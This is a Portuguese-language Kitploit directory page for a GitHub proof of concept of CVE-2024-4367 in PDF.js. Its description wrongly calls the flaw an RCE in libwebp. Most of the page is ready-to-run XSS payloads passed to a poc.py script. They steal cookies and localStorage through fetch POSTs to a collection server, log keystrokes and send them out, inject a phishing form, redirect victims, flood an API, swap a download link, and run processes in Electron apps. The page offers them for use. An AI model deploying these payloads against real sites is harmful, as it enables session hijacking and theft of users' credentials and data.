Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-4367-POC-PDFJS — PoC (Proof of Concept) da CVE-2024-4367 - Vulnerabilidade RCE em libwebp. Demonstração completa incluindo: criação de payloads, cenários de ataque, análise de riscos e servidor Express.js de teste. | Kitploit
Ferramentas/GitHubGitHub/elamani-drawing/cve-2024-4367-poc-pdfjs
Ferramentas de PhishingGeração de PayloadsExploraçãoExploração de Aplicações WebExfiltração de DadosEngenharia SocialAprendizado e Educação
GitHubelamani-drawing/cve-2024-4367-poc-pdfjs

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2024-4367-POC-PDFJS

PoC (Proof of Concept) da CVE-2024-4367 - Vulnerabilidade RCE em libwebp. Demonstração completa incluindo: criação de payloads, cenários de ataque, análise de riscos e servidor Express.js de teste.

Ver Repositório
16há 1 anoAinda não revisado

CVE 2024 4367: PoC para exploração de XSS (Cross-Site Scripting)

1. Exibição de um Alerta (Disparo de XSS)

Outro exemplo de exploração consiste em injetar uma simples mensagem de alerta para verificar se o ataque funciona.

root@kitploit:~
python poc.py "alert('XSS exploit triggered');"
  • Explicação: Este código injeta um pop-up de alerta na página, o que permite testar rapidamente se o exploit XSS é executado no site alvo.

2. Roubo de Cookies

O ataque XSS pode ser usado para roubar os cookies da vítima e enviá-los a um servidor malicioso.

root@kitploit:~
python poc.py "fetch('http://localhost:3000/cookie', {method: 'POST', headers: {'Content-Type': 'application/json'}, body: JSON.stringify({cookie: document.cookie})});"
  • Explicação: O script modifica a URL da página para incluir os cookies da vítima, que são então enviados a um servidor malicioso (http://localhost:3000/cookie).

3. Roubo de Dados Armazenados Localmente (LocalStorage)

O atacante pode roubar informações sensíveis armazenadas no localStorage da vítima, como dados de autenticação ou informações de sessão.

root@kitploit:~
python poc.py "fetch('http://localhost:3000/localstorage', { method: 'POST', headers: {'Content-Type': 'application/json'}, body: JSON.stringify({localstorage: JSON.stringify(localStorage)})});"
  • Explicação: O código recupera os dados sensíveis armazenados no localStorage e os envia a um servidor malicioso por meio de uma requisição fetch.

4. Redirecionamento Malicioso

O atacante pode redirecionar a vítima para um site malicioso a fim de obter informações adicionais ou carregar outro exploit.

root@kitploit:~
python poc.py "window.location.href='http://localhost:3000';"
  • Explicação: Este script redireciona imediatamente a vítima para um site malicioso, o que pode ser usado em ataques de phishing ou para instalar softwares maliciosos.

5. Ataque por DDoS (Flooding de API)

Outro tipo de ataque consiste em inundar um servidor com requisições, o que pode levar à degradação do desempenho ou à interrupção do serviço.

root@kitploit:~
python poc.py  "for (let i = 0; i < 100; i++) { fetch('http://localhost:3000/api'); }"
  • Explicação: O script envia 100 requisições HTTP a uma API alvo, o que pode causar sobrecarga do servidor (ataque de negação de serviço).

6. Keylogger (Roubo de teclas digitadas)

O atacante pode interceptar as teclas digitadas pela vítima, o que lhe permite obter informações sensíveis como senhas ou identificadores.

root@kitploit:~
python poc.py """document.addEventListener('keydown', function(e) {
    fetch('http://localhost:3000/keylogger?key=' + e.key);
});"""
  • Explicação: Este script registra cada tecla pressionada pela vítima e envia essas informações a um servidor malicioso.

7. Phishing via Formulário Injetado (Roubo de dados sensíveis)

Um atacante pode usar XSS para injetar um formulário de phishing em uma página da Web e assim roubar informações sensíveis (ex.: senha, nome de usuário).

root@kitploit:~
python poc.py """
var form = document.createElement('form');
form.method = 'POST';
form.action = 'http://localhost:3000/phishing';
var input = document.createElement('input');
input.type = 'text';
input.name = 'username';
form.appendChild(input);
document.body.appendChild(form);
form.submit();
"""
  • Explicação: Este código injeta um formulário na página, permitindo que o atacante obtenha informações sensíveis que o usuário envia por meio desse formulário de phishing.

8. Usurpação

Se o usuário for clicar em um botão de download, vamos alterar o destino do download.

root@kitploit:~
const a = document.createElement('a');
a.href = "https://example.com/fichier.pdf";
a.download = "fichier.pdf"; 
document.body.appendChild(a);
a.click();
document.body.removeChild(a);
  • Explicação: Este script atualiza o link de uma URL de download; a ideia é modificar um botão existente para que ele baixe um arquivo malicioso em vez daquele previsto pelo usuário.

9. Ataques em Aplicações de Desktop (Electron, NW.js)

root@kitploit:~
python poc.py "require('child_process').exec('calc.exe')"

Aplicações baseadas em frameworks como Electron ou NW.js também podem ser afetadas por ataques XSS, pois permitem integrar conteúdo web em aplicações de desktop com amplos acessos locais.
Essas aplicações, devido às suas permissões, podem permitir que um atacante acesse arquivos locais, execute processos externos ou até mesmo inicie outros aplicativos na máquina alvo (por exemplo, a calculadora, um editor de texto, etc.). Isso aumenta consideravelmente a superfície de ataque, pois essas aplicações combinam o poder da web com acessos mais amplos ao sistema.


Conclusão

Os ataques que exploram CVEs (Common Vulnerabilities and Exposures) podem permitir a realização de diversos tipos de ataques XSS. Ao explorar vulnerabilidades específicas em aplicações web ou de desktop, um atacante pode injetar código malicioso, roubar informações sensíveis, manipular sessões de usuário ou executar ações maliciosas no sistema alvo

Baixar ferramenta